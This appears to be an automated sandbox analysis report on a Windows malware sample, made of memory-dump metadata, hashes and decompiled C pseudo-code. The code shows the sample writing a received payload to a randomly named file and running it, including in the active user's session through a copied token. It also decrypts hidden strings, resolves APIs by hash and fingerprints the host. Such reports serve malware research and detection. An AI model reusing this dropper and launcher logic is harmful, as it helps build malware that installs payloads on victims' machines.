0x013e7c5d
0x00000000
0x013e7c63
0x013e7c68
0x013e7c6b
0x013e7c70
0x013e7c73
0x013e7c76
0x013e7c78
0x013e7c7d
0x00000000
0x013e7c83
0x013e7c86
0x013e7c8b
0x013e7c93
0x00000000
0x013e7c93
0x013e7c7d
0x013e7c5d
0x013e7c37
0x013e7bd9
0x013e7b4b
0x013e7b4b
0x013e7b55
0x00000000
0x013e7b5b
0x013e7b60
0x013e7b63
0x013e7b69
0x00000000
0x013e7b6f
0x013e7b72
0x013e7b80
0x00000000
0x013e7b82
0x013e7b82
0x013e7b8c
0x00000000
0x013e7b92
0x013e7b97
0x013e7b9a
0x013e7ba0
0x00000000
0x013e7ba6
0x013e7ba9
0x013e7bb7
0x013e7bba
0x00000000
0x00000000
0x00000000
0x00000000
0x013e7bba
0x013e7ba0
0x013e7b8c
0x013e7b80
0x013e7b69
0x013e7b55
0x013e7b49
0x013e7b31
0x013e7f55
0x013e7f55
0x013e7f58
0x013e7f5e
0x013e7f67
0x013e7f70
0x013e7f73
0x013e7f78
0x013e7fb1
0x013e7fb6
0x013e7fb9
0x013e7fc1
0x013e7fcc
0x013e7fd0
0x013e8002
0x013e7fd2
0x013e7fd2
0x00000000
0x013e7fd2
0x013e7f7a
0x013e7f7a
0x013e7f7d
0x013e7f80
0x013e7f89
0x013e781b
0x013e781b
0x00000000
0x013e7f8f
0x013e7f9f
0x00000000
0x013e7fa1
0x013e7fa8
0x013e7fab
0x00000000
0x00000000
0x00000000
0x00000000
0x013e7fab
0x013e7f9f
0x013e7f89
0x00000000
0x013e7f78
0x00000000
0x013e7acf
0x013e7acf
0x013e7acf
0x013e7acf
0x00000000
0x013e7961
0x013e7963
0x013e7ad2
0x013e7ad5
0x00000000
0x013e7cb1
0x013e7cb1
0x013e7cb4
0x00000000
0x013e7cb4
0x013e7976
0x013e7979
0x013e797c
0x013e7984
0x013e798d
0x013e7a83
0x013e7a83
0x013e7a85
0x013e7ae3
0x013e7ae3
0x013e7ae6
0x013e7aeb
0x013e7cb7
0x013e7cb7
0x013e7cb9
0x013e7cbb
0x013e7af1
0x013e7af7
0x00000000
0x013e7b06
0x013e7af7
0x013e7993
0x013e7996
0x013e79a0
0x013e79a9
0x013e79ac
0x00000000
0x00000000
0x00000000
0x013e79ac
0x013e79ae
0x013e79b4
0x00000000
0x013e79ba
0x013e79ba
0x00000000
0x013e79ba
0x013e79b4
0x013e798d
0x013e7963
0x013e7cbe
0x013e7cc3
0x013e7e53
0x013e7e9b
0x013e7ed3
0x013e7ed6
0x013e7ed9
0x013e7ed9
0x013e7ede
0x013e7ee1
0x013e7ee6
0x013e7eec
0x013e7ef2
0x013e7efc
0x013e7efe
0x013e7efe
0x013e7f01
0x013e7f03
0x013e7f06
0x013e7f0a
0x013e7f11
0x013e7f11
0x013e7f16
0x013e7f24
0x013e7f2b
0x013e7f32
0x013e7f35
0x013e7f38
0x013e7f43
0x013e7f45
0x00000000
0x013e7f45
0x013e7ead
0x013e7ead
0x013e7eb7
0x013e7ec2
0x013e7ec5
0x013e7ec8
0x013e7ec8
0x013e7e55
0x013e7e5c
0x013e7e5f
0x013e7e69
0x013e7e6c
0x013e7e71
0x013e7e74
0x013e7e76
0x013e7e76
0x013e7e79
0x013e7e7b
0x013e7e7e
0x013e7e82
0x013e7e89
0x013e7e89
0x013e7e8c
0x013e7e8f
0x013e7f4d
0x013e7f4d
0x013e7f4d
0x013e7cc9
0x013e7ccb
0x013e7dbb
0x013e7dc7
0x013e7dca
0x013e7dcf
0x013e7dd2
0x013e7dd8
0x013e7dde
0x013e7de8
0x013e7dea
0x013e7dea
0x013e7ded
0x013e7def
0x013e7df2
0x013e7df6
0x013e7dfd
0x013e7dfd
0x013e7e1e
0x013e7e21
0x013e7e29
0x013e7e2f
0x013e7e39
0x013e7e39
0x013e7e44
0x013e7e45
0x013e7cd1
0x013e7cd4
0x013e7cd7
0x013e7cda
0x013e7cdf
0x013e7ce2
0x013e7ce4
0x013e7ce4
0x013e7ce7
0x013e7ce9
0x013e7cec
0x013e7cf0
0x013e7cf7
0x013e7cf7
0x013e7cfd
0x013e7d0b
0x013e7daa
0x013e7dad
0x013e7db0
0x013e7db3
0x013e7d11
0x013e7d14
0x013e7d17
0x013e7d1a
0x013e7d1a
0x013e7d1f
0x013e7d22
0x013e7d27
0x013e7d2d
0x013e7d33
0x013e7d3d
0x013e7d3f
0x013e7d3f
0x013e7d42
0x013e7d44
0x013e7d47
0x013e7d4b
0x013e7d52
0x013e7d52
0x013e7d57
0x013e7d65
0x013e7d6c
0x013e7d73
0x013e7d76
0x013e7d79
0x013e7d84
0x013e7d8e
0x013e7d8e
0x013e7d96
0x013e7d96
0x013e7d0b
0x013e7ccb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x013e791a
0x013e7fe2
0x013e7fe9
0x013e7ff4
0x00000000

Memory Dump Source

Source File: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true

Associated: 00000001.00000002.197421238.00000000013E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197429793.00000000013EB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197432264.00000000013EC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.197434673.00000000013ED000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13e0000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c5bb1db0327370c84092411c524906080046609157609d1889f5a097a658477
Instruction ID: cd41322e97f16f0166702bbdde405dd5e101a99bb9d75cd2ae48fad5735d23d7
Opcode Fuzzy Hash: 3c5bb1db0327370c84092411c524906080046609157609d1889f5a097a658477
Instruction Fuzzy Hash: 7B42BC31A00B558FDB25CF69C0946BAFBF2FF88308F18896DD49A97791D734A941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013E1BE0, Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true

Associated: 00000001.00000002.197421238.00000000013E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197429793.00000000013EB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197432264.00000000013EC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.197434673.00000000013ED000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13e0000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33c5dfdfbcfe9feac0c960751525ee3cd10a70b8a830c79ced4a8ef27683a6d5
Instruction ID: 29ca608993fa79594a165a78411f24c2a3269de3ecd52976bfc715003d40b59e
Opcode Fuzzy Hash: 33c5dfdfbcfe9feac0c960751525ee3cd10a70b8a830c79ced4a8ef27683a6d5
Instruction Fuzzy Hash: CE01FC337001299BCF20CF4ED5C46B9F3F5FB8426979940A9D948C7240E731B961C790

Uniqueness

Uniqueness Score: -1.00%

Function 013EA3A0, Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 225
memoryfileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 63%

			E013EA3A0(long _a4) {
				void* _v8;
				long _v12;
				struct _PROCESS_INFORMATION _v28;
				struct _STARTUPINFOW _v96;
				char _v156;
				char _v284;
				short _v804;
				char _v1324;
				void* _t58;
				signed int _t62;
				WCHAR* _t68;
				long _t89;
				signed int _t93;
				WCHAR* _t99;
				void* _t122;
				void* _t123;
				void* _t136;
				void* _t139;
				void* _t140;
				void* _t143;
				void* _t144;
				void* _t145;
				void* _t146;

				_t136 = _a4;
				_t58 =  *((intOrPtr*)(_t136 + 4)) - 1;
				if(_t58 == 0) {
					_t122 =  *(_t136 + 8);
					_a4 =  *((intOrPtr*)(_t136 + 0xc));
					 *0x13ec214(0, 0x23, 0, 0,  &_v804);
					_t62 = GetTickCount();
					_t39 = (_t62 & 0x0000000f) + 4; // 0x4
					E013E2240( &_v284, _t39);
					 *((short*)(_t146 + (_t62 & 0x0000000f) * 2 - 0x110)) = 0;
					E013E1830(0x13e15a4, 0xc, 0x435ca571,  &_v12);
					_t139 = _v12;
					_t68 =  &_v804;
					 *0x13ec200(_t68, 0x104, _t139, _t68,  &_v284);
					HeapFree(GetProcessHeap(), 0, _t139);
					_t140 = CreateFileW( &_v804, 0x40000000, 0, 0, 2, 0x80, 0);
					if(_t140 == 0xffffffff) {
						L13:
						HeapFree(GetProcessHeap(), 0, _t136);
						return 0;
					}
					WriteFile(_t140, _t122, _a4,  &_a4, 0);
					CloseHandle(_t140);
					memset( &_v96, 0, 0x44);
					_v96.cb = 0x44;
					if(CreateProcessW( &_v804, 0, 0, 0, 0, 0, 0, 0,  &_v96,  &_v28) == 0) {
						goto L13;
					}
					CloseHandle(_v28.hProcess);
					_push(_v28.hThread);
					L12:
					CloseHandle();
					goto L13;
				}
				if(_t58 != 1) {
					goto L13;
				}
				_t89 =  *((intOrPtr*)(_t136 + 0xc));
				_t123 =  *(_t136 + 8);
				_v12 = _t89;
				_a4 = 0;
				__imp__WTSGetActiveConsoleSessionId();
				if(_t89 == 0xffffffff) {
					goto L13;
				}
				_push( &_v8);
				_push(_t89);
				if( *0x13ec224() != 0) {
					 *0x13ec074(_v8, 0x2000000, 0, 1, 1,  &_a4);
					CloseHandle(_v8);
				}
				 *0x13ec214(0, 0x23, 0, 0,  &_v804);
				_t93 = GetTickCount();
				_t13 = (_t93 & 0x0000000f) + 4; // 0x4
				E013E2240( &_v156, _t13);
				 *((short*)(_t146 + (_t93 & 0x0000000f) * 2 - 0x90)) = 0;
				E013E1830(0x13e15a4, 0xc, 0x435ca571,  &_v8);
				_t143 = _v8;
				_t99 =  &_v804;
				 *0x13ec200(_t99, 0x104, _t143, _t99,  &_v156);
				HeapFree(GetProcessHeap(), 0, _t143);
				_t144 = CreateFileW( &_v804, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t144 != 0xffffffff) {
					WriteFile(_t144, _t123, _v12,  &_v12, 0);
					CloseHandle(_t144);
					E013E1830(0x13e1398, 4, 0x435ca571,  &_v8);
					_t145 = _v8;
					 *0x13ec200( &_v1324, 0x104, _t145,  &_v804);
					HeapFree(GetProcessHeap(), 0, _t145);
					if(E013E2180( &_v1324, _a4,  &_v28) != 0) {
						CloseHandle(_v28);
						CloseHandle(_v28.hThread);
					}
				}
				_push(_a4);
				goto L12;
			}

0x013ea3ac
0x013ea3b2
0x013ea3b3
0x013ea550
0x013ea553
0x013ea565
0x013ea56b
0x013ea57c
0x013ea57f
0x013ea58b
0x013ea5a1
0x013ea5a6
0x013ea5b0
0x013ea5be
0x013ea5d1
0x013ea5f6
0x013ea5fb
0x013ea666
0x013ea670
0x013ea67e
0x013ea67e
0x013ea608
0x013ea60f
0x013ea61d
0x013ea626
0x013ea652
0x00000000
0x00000000
0x013ea657
0x013ea65d
0x013ea660
0x013ea660
0x00000000
0x013ea660
0x013ea3ba
0x00000000
0x00000000
0x013ea3c0
0x013ea3c3
0x013ea3c6
0x013ea3c9
0x013ea3d0
0x013ea3d9
0x00000000
0x00000000
0x013ea3e2
0x013ea3e3
0x013ea3ec
0x013ea400
0x013ea409
0x013ea409
0x013ea41e
0x013ea424
0x013ea435
0x013ea438
0x013ea444
0x013ea45a
0x013ea45f
0x013ea469
0x013ea477
0x013ea48a
0x013ea4af
0x013ea4b4
0x013ea4c5
0x013ea4cc
0x013ea4e5
0x013ea4ea
0x013ea501
0x013ea514
0x013ea531
0x013ea536
0x013ea53f
0x013ea53f
0x013ea531
0x013ea545
0x00000000

APIs

WTSGetActiveConsoleSessionId.KERNEL32 ref: 013EA3D0
CloseHandle.KERNEL32(?), ref: 013EA409
GetTickCount.KERNEL32 ref: 013EA424
_snwprintf.NTDLL ref: 013EA477
GetProcessHeap.KERNEL32(00000000,?), ref: 013EA483
HeapFree.KERNEL32(00000000), ref: 013EA48A
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 013EA4A9
WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 013EA4C5
CloseHandle.KERNEL32(00000000), ref: 013EA4CC
_snwprintf.NTDLL ref: 013EA501
GetProcessHeap.KERNEL32(00000000,?), ref: 013EA50D
HeapFree.KERNEL32(00000000), ref: 013EA514
CloseHandle.KERNEL32(?), ref: 013EA536
CloseHandle.KERNEL32(?), ref: 013EA53F
GetTickCount.KERNEL32 ref: 013EA56B
_snwprintf.NTDLL ref: 013EA5BE
GetProcessHeap.KERNEL32(00000000,?), ref: 013EA5CA
HeapFree.KERNEL32(00000000), ref: 013EA5D1
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 013EA5F0
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 013EA608
CloseHandle.KERNEL32(00000000), ref: 013EA60F
memset.NTDLL ref: 013EA61D
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 013EA64A
CloseHandle.KERNEL32(?), ref: 013EA657
CloseHandle.KERNEL32(?), ref: 013EA660
GetProcessHeap.KERNEL32(00000000,?), ref: 013EA669
HeapFree.KERNEL32(00000000), ref: 013EA670

Strings

D, xrefs: 013EA626

Memory Dump Source

Source File: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true

Associated: 00000001.00000002.197421238.00000000013E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197429793.00000000013EB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197432264.00000000013EC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.197434673.00000000013ED000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13e0000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$CloseHandle$Process$FileFree$Create_snwprintf$CountTickWrite$ActiveConsoleSessionmemset
String ID: D
API String ID: 65010116-2746444292
Opcode ID: 63bc6eecb7073873adc37391d10bb73041af28f1a1a40c3e90df8820ab339ddd
Instruction ID: 39f664d1bf4b9eb0c473accb73322ce30657078fa898514c903c3f726b8a2815
Opcode Fuzzy Hash: 63bc6eecb7073873adc37391d10bb73041af28f1a1a40c3e90df8820ab339ddd
Instruction Fuzzy Hash: 20812A72940319BBEB309BA4DC49FEE7BBCEB08315F004155FA19EA1C4D770AA448BA0

Uniqueness

Uniqueness Score: -1.00%

Function 013E9320, Relevance: 39.2, APIs: 26, Instructions: 246
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E013E9320(void* __ecx) {
				void* _v8;
				long _v12;
				short _v44;
				intOrPtr _t25;
				void* _t27;
				void* _t28;
				signed int _t32;
				char* _t35;
				int _t53;
				signed int _t60;
				void* _t71;
				long _t72;
				void* _t74;
				void* _t75;
				signed int _t76;
				char _t77;
				void* _t79;
				signed short* _t80;
				long _t87;
				void* _t92;
				void* _t94;
				short* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t106;

				_t75 = __ecx;
				_t25 =  *0x13ec27c; // 0x0
				_t103 = _t102 - 0x28;
				 *0x13ec3ac = _t25;
				GetModuleFileNameW(0, 0x13ec9c8, 0x104);
				_t27 =  *0x13ec040(0, 0, 6);
				if(_t27 != 0) {
					 *0x13ec2a4 =  *0x13ec2a4 | 0x00000001;
					 *0x13ec0a8(_t27);
				}
				_t28 =  *0x13ec3ac; // 0x0
				_t96 = 0x13ec3b0;
				_v8 = _t28;
				_t92 = RtlAllocateHeap(GetProcessHeap(), 8, 0x15c);
				if(_t92 == 0) {
					_t92 = _v12;
				} else {
					_push(_t75);
					E013E1790(0x13e13d0, 0x158, _t92);
					_t103 = _t103 + 8;
				}
				_t76 =  *0x13ec1e4(_t92, _t71);
				_t72 = 2;
				_v12 = _t76;
				do {
					_t32 = _v8;
					_v8 =  !(_t32 / _t76);
					_t35 = _t92 + _t32 % _t76;
					if(_t35 <= _t92) {
						L9:
						if( *_t35 != 0x2c) {
							L11:
							_t77 =  *_t35;
							if(_t77 == 0) {
								goto L15;
							}
							while(_t77 != 0x2c) {
								_t35 = _t35 + 1;
								 *_t96 = _t77;
								_t96 = _t96 + 2;
								_t77 =  *_t35;
								if(_t77 != 0) {
									continue;
								}
								goto L15;
							}
							goto L15;
						}
						L10:
						_t35 = _t35 + 1;
						goto L11;
					}
					while( *_t35 != 0x2c) {
						_t35 = _t35 - 1;
						if(_t35 > _t92) {
							continue;
						}
						goto L9;
					}
					goto L10;
					L15:
					_t76 = _v12;
					_t72 = _t72 - 1;
				} while (_t72 != 0);
				HeapFree(GetProcessHeap(), 0, _t92);
				 *_t96 = 0;
				E013E1830(0x13e1384, 0xc, 0x7d1cc189,  &_v12);
				_t104 = _t103 + 8;
				_push(0x13ec5b8);
				_push(0);
				_push(0);
				if(( *0x13ec2a4 & 0x00000001) == 0) {
					 *0x13ec214(0, 0x1c);
					_t87 = 0x14;
					_t79 = 0x13e1530;
				} else {
					 *0x13ec214(0, 0x29);
					_t87 = 4;
					_t79 = 0x13e1380;
				}
				E013E1830(_t79, _t87, 0x7d1cc189,  &_v8);
				_t97 = _v8;
				 *0x13ec200(0x13ec5b8, 0x104, _t97, 0x13ec5b8, 0x13ec3b0);
				HeapFree(GetProcessHeap(), 0, _t97);
				_t98 = _v12;
				 *0x13ec200(0x13ec7c0, 0x104, _t98, 0x13ec5b8, 0x13ec3b0);
				_t106 = _t104 + 0x30;
				HeapFree(GetProcessHeap(), 0, _t98);
				_t99 = CreateFileW(0x13ec9c8, 0x80000000, 1, 0, 3, 0, 0);
				if(_t99 != 0xffffffff) {
					_t94 = CreateFileMappingW(_t99, 0, 2, 0, 0, 0);
					if(_t94 != 0) {
						_t74 = MapViewOfFile(_t94, 4, 0, 0, 0);
						if(_t74 != 0) {
							 *0x13ecbd0 = RtlComputeCrc32(0, _t74, GetFileSize(_t99, 0));
							UnmapViewOfFile(_t74);
						}
						CloseHandle(_t94);
					}
					CloseHandle(_t99);
				}
				_v12 = 0x10;
				_t53 = GetComputerNameW( &_v44,  &_v12);
				if(_t53 == 0) {
					L40:
					return _t53;
				} else {
					_t80 =  &_v44;
					if(_v44 == 0) {
						L36:
						_t101 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
						if(_t101 == 0) {
							_t101 = _v12;
						} else {
							_push(_t80);
							E013E1790(0x13e1390, 8, _t101);
							_t106 = _t106 + 8;
						}
						 *0x13ec210(0x13ec2a8, 0x104, _t101,  &_v44,  *0x13ec3ac);
						_t53 = HeapFree(GetProcessHeap(), 0, _t101);
						goto L40;
					}
					do {
						_t60 =  *_t80 & 0x0000ffff;
						if(_t60 < 0x30 || _t60 > 0x39) {
							if(_t60 < 0x61 || _t60 > 0x7a) {
								if(_t60 < 0x41 || _t60 > 0x5a) {
									 *_t80 = 0x58;
								}
							}
						}
						_t80 =  &(_t80[1]);
					} while ( *_t80 != 0);
					goto L36;
				}
			}

0x013e9320
0x013e9323
0x013e9328
0x013e932b
0x013e933c
0x013e9348
0x013e9350
0x013e9352
0x013e935a
0x013e935a
0x013e9360
0x013e936e
0x013e9373
0x013e9383
0x013e9387
0x013e939f
0x013e9389
0x013e9389
0x013e9395
0x013e939a
0x013e939a
0x013e93aa
0x013e93ac
0x013e93b1
0x013e93b4
0x013e93b4
0x013e93bd
0x013e93c0
0x013e93c5
0x013e93d1
0x013e93d4
0x013e93d7
0x013e93d7
0x013e93db
0x00000000
0x00000000
0x013e93e0
0x013e93e9
0x013e93ea
0x013e93ed
0x013e93f0
0x013e93f4
0x00000000
0x00000000
0x00000000
0x013e93f4
0x00000000
0x013e93e0
0x013e93d6
0x013e93d6
0x00000000
0x013e93d6
0x013e93c7
0x013e93cc
0x013e93cf
0x00000000
0x00000000
0x00000000
0x013e93cf
0x00000000
0x013e93f6
0x013e93f6
0x013e93f9
0x013e93f9
0x013e9406
0x013e9413
0x013e9424
0x013e9429
0x013e9433
0x013e9438
0x013e943a
0x013e943c
0x013e9458
0x013e945e
0x013e9463
0x013e943e
0x013e9442
0x013e9448
0x013e944d
0x013e944d
0x013e9471
0x013e9476
0x013e948e
0x013e94a1
0x013e94a7
0x013e94bf
0x013e94c5
0x013e94d2
0x013e94f2
0x013e94f7
0x013e950a
0x013e950e
0x013e951f
0x013e9523
0x013e9539
0x013e953e
0x013e953e
0x013e9545
0x013e9545
0x013e954c
0x013e954c
0x013e9555
0x013e9561
0x013e956a
0x013e960b
0x013e9610
0x013e9570
0x013e9575
0x013e9578
0x013e95ad
0x013e95be
0x013e95c2
0x013e95da
0x013e95c4
0x013e95c4
0x013e95d0
0x013e95d5
0x013e95d5
0x013e95f2
0x013e9605
0x00000000
0x013e9605
0x013e9580
0x013e9580
0x013e9586
0x013e9590
0x013e959a
0x013e95a1
0x013e95a1
0x013e959a
0x013e9590
0x013e95a4
0x013e95a7
0x00000000
0x013e9580

APIs

GetModuleFileNameW.KERNEL32(00000000,013EC9C8,00000104,?,?,?,?,?,?,?,?,?,013E9310), ref: 013E933C
GetProcessHeap.KERNEL32(00000008,0000015C,00000000,013E16C0,?,?,?,?,?,?,?,?,?,013E9310), ref: 013E9376
RtlAllocateHeap.NTDLL(00000000), ref: 013E937D
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,013E9310), ref: 013E93A4
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,013E9310), ref: 013E93FF
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,013E9310), ref: 013E9406
_snwprintf.NTDLL ref: 013E948E
GetProcessHeap.KERNEL32(00000000,013E9310), ref: 013E949A
HeapFree.KERNEL32(00000000), ref: 013E94A1
_snwprintf.NTDLL ref: 013E94BF
GetProcessHeap.KERNEL32(00000000,?), ref: 013E94CB
HeapFree.KERNEL32(00000000), ref: 013E94D2
CreateFileW.KERNEL32(013EC9C8,80000000,00000001,00000000,00000003,00000000,00000000), ref: 013E94EC
CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 013E9504
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 013E9519
GetFileSize.KERNEL32(00000000,00000000), ref: 013E9528
RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 013E9532
UnmapViewOfFile.KERNEL32(00000000), ref: 013E953E
CloseHandle.KERNEL32(00000000), ref: 013E9545
CloseHandle.KERNEL32(00000000), ref: 013E954C
GetComputerNameW.KERNEL32(?,?), ref: 013E9561
GetProcessHeap.KERNEL32(00000008,0000000C), ref: 013E95B1
RtlAllocateHeap.NTDLL(00000000), ref: 013E95B8
_snprintf.NTDLL ref: 013E95F2
GetProcessHeap.KERNEL32(00000000,00000010), ref: 013E95FE
HeapFree.KERNEL32(00000000), ref: 013E9605

Memory Dump Source

Source File: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true

Associated: 00000001.00000002.197421238.00000000013E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197429793.00000000013EB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197432264.00000000013EC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.197434673.00000000013ED000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13e0000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$FileProcess$Free$AllocateCloseCreateHandleNameView_snwprintf$ComputeComputerCrc32MappingModuleSizeUnmap_snprintflstrlen
String ID:
API String ID: 968319538-0
Opcode ID: 89db9f5d39b4c64f52f6b0046a875af2f6548e025726926a5f3dbb1173a78c01
Instruction ID: 9288ae2260fa976365f6be4087934b0659a3e096e8330d13c88300303ace49dc
Opcode Fuzzy Hash: 89db9f5d39b4c64f52f6b0046a875af2f6548e025726926a5f3dbb1173a78c01
Instruction Fuzzy Hash: AC81A071A40324FBFB305BA99C4DFAE3BECAB45B19F142015FA15EE2C4D6B089408765

Uniqueness

Uniqueness Score: -1.00%

Function 013E9C50, Relevance: 36.2, APIs: 24, Instructions: 185
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E013E9C50(void* __ecx) {
				void* _v8;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t105;
				void* _t106;
				void* _t107;

				_push(__ecx);
				E013E1830(0x13e155c, 0xc, 0x4a604ebc,  &_v8);
				_t100 = _v8;
				E013E1B10(LoadLibraryW(_t100), 0x13e1040, 0x21, 0x54b7e774, 0x13ec040);
				HeapFree(GetProcessHeap(), 0, _t100);
				E013E1830(0x13e1568, 0xc, 0x4a604ebc,  &_v8);
				_t101 = _v8;
				E013E1B10(LoadLibraryW(_t101), 0x13e1024, 1, 0x3c505b91, 0x13ec0c8);
				HeapFree(GetProcessHeap(), 0, _t101);
				E013E1830(0x13e1574, 0xc, 0x4a604ebc,  &_v8);
				_t102 = _v8;
				E013E1B10(LoadLibraryW(_t102), 0x13e1028, 2, 0x10577008, 0x13ec214);
				HeapFree(GetProcessHeap(), 0, _t102);
				E013E1830(0x13e1580, 0xc, 0x4a604ebc,  &_v8);
				_t103 = _v8;
				E013E1B10(LoadLibraryW(_t103), 0x13e100c, 1, 0x7194b56b, 0x13ec0c4);
				HeapFree(GetProcessHeap(), 0, _t103);
				E013E1830(0x13e1550, 0xc, 0x4a604ebc,  &_v8);
				_t104 = _v8;
				E013E1B10(LoadLibraryW(_t104), 0x13e10c4, 1, 0x20edec96, 0x13ec0cc);
				HeapFree(GetProcessHeap(), 0, _t104);
				E013E1830(0x13e1544, 0xc, 0x4a604ebc,  &_v8);
				_t105 = _v8;
				E013E1B10(LoadLibraryW(_t105), 0x13e10c8, 2, 0x620cb38e, 0x13ec21c);
				HeapFree(GetProcessHeap(), 0, _t105);
				E013E1830(0x13e1598, 0xc, 0x4a604ebc,  &_v8);
				_t106 = _v8;
				E013E1B10(LoadLibraryW(_t106), 0x13e1220, 0xe, 0x5a7185ae, 0x13ec230);
				HeapFree(GetProcessHeap(), 0, _t106);
				E013E1830(0x13e158c, 0xc, 0x4a604ebc,  &_v8);
				_t107 = _v8;
				E013E1B10(LoadLibraryW(_t107), 0x13e1214, 3, 0x73ee0ad8, 0x13ec224);
				HeapFree(GetProcessHeap(), 0, _t107);
				return E013E92A0(_t61);
			}

0x013e9c53
0x013e9c68
0x013e9c6d
0x013e9c8d
0x013e9c9f
0x013e9cb8
0x013e9cbd
0x013e9cdd
0x013e9cef
0x013e9d08
0x013e9d0d
0x013e9d2d
0x013e9d3f
0x013e9d58
0x013e9d5d
0x013e9d7d
0x013e9d8f
0x013e9da8
0x013e9dad
0x013e9dcd
0x013e9ddf
0x013e9df8
0x013e9dfd
0x013e9e1d
0x013e9e2f
0x013e9e48
0x013e9e4d
0x013e9e6d
0x013e9e7f
0x013e9e98
0x013e9ea0
0x013e9ebd
0x013e9ecf
0x013e9ede

APIs

Part of subcall function 013E1830: GetProcessHeap.KERNEL32(00000008,013E9F6B,00000000,00000000,013E1004,?,013E15F4,4DBAC13F,013E9F6B,?,00000000), ref: 013E1844
Part of subcall function 013E1830: RtlAllocateHeap.NTDLL(00000000,?,013E15F4), ref: 013E184B

LoadLibraryW.KERNEL32(013E16C0,?,013E16C0), ref: 013E9C74
GetProcessHeap.KERNEL32(00000000,013E16C0,?,?,?,?,013E16C0), ref: 013E9C98
HeapFree.KERNEL32(00000000,?,?,?,?,013E16C0), ref: 013E9C9F
LoadLibraryW.KERNEL32(013E16C0,?,?,?,?,?,?,013E16C0), ref: 013E9CC4
GetProcessHeap.KERNEL32(00000000,013E16C0,?,?,?,?,?,?,?,?,?,013E16C0), ref: 013E9CE8
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,013E16C0), ref: 013E9CEF
LoadLibraryW.KERNEL32(013E16C0,?,?,?,?,?,?,?,?,?,?,?,013E16C0), ref: 013E9D14
GetProcessHeap.KERNEL32(00000000,013E16C0), ref: 013E9D38
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,013E16C0), ref: 013E9D3F
LoadLibraryW.KERNEL32(013E16C0), ref: 013E9D64
GetProcessHeap.KERNEL32(00000000,013E16C0), ref: 013E9D88
HeapFree.KERNEL32(00000000), ref: 013E9D8F
LoadLibraryW.KERNEL32(013E16C0), ref: 013E9DB4
GetProcessHeap.KERNEL32(00000000,013E16C0), ref: 013E9DD8
HeapFree.KERNEL32(00000000), ref: 013E9DDF
LoadLibraryW.KERNEL32(013E16C0), ref: 013E9E04
GetProcessHeap.KERNEL32(00000000,013E16C0), ref: 013E9E28
HeapFree.KERNEL32(00000000), ref: 013E9E2F
LoadLibraryW.KERNEL32(013E16C0), ref: 013E9E54
GetProcessHeap.KERNEL32(00000000,013E16C0), ref: 013E9E78
HeapFree.KERNEL32(00000000), ref: 013E9E7F
LoadLibraryW.KERNEL32(013E16C0), ref: 013E9EA4
GetProcessHeap.KERNEL32(00000000,013E16C0), ref: 013E9EC8
HeapFree.KERNEL32(00000000), ref: 013E9ECF

Part of subcall function 013E92A0: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 013E92B5

Memory Dump Source

Source File: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true

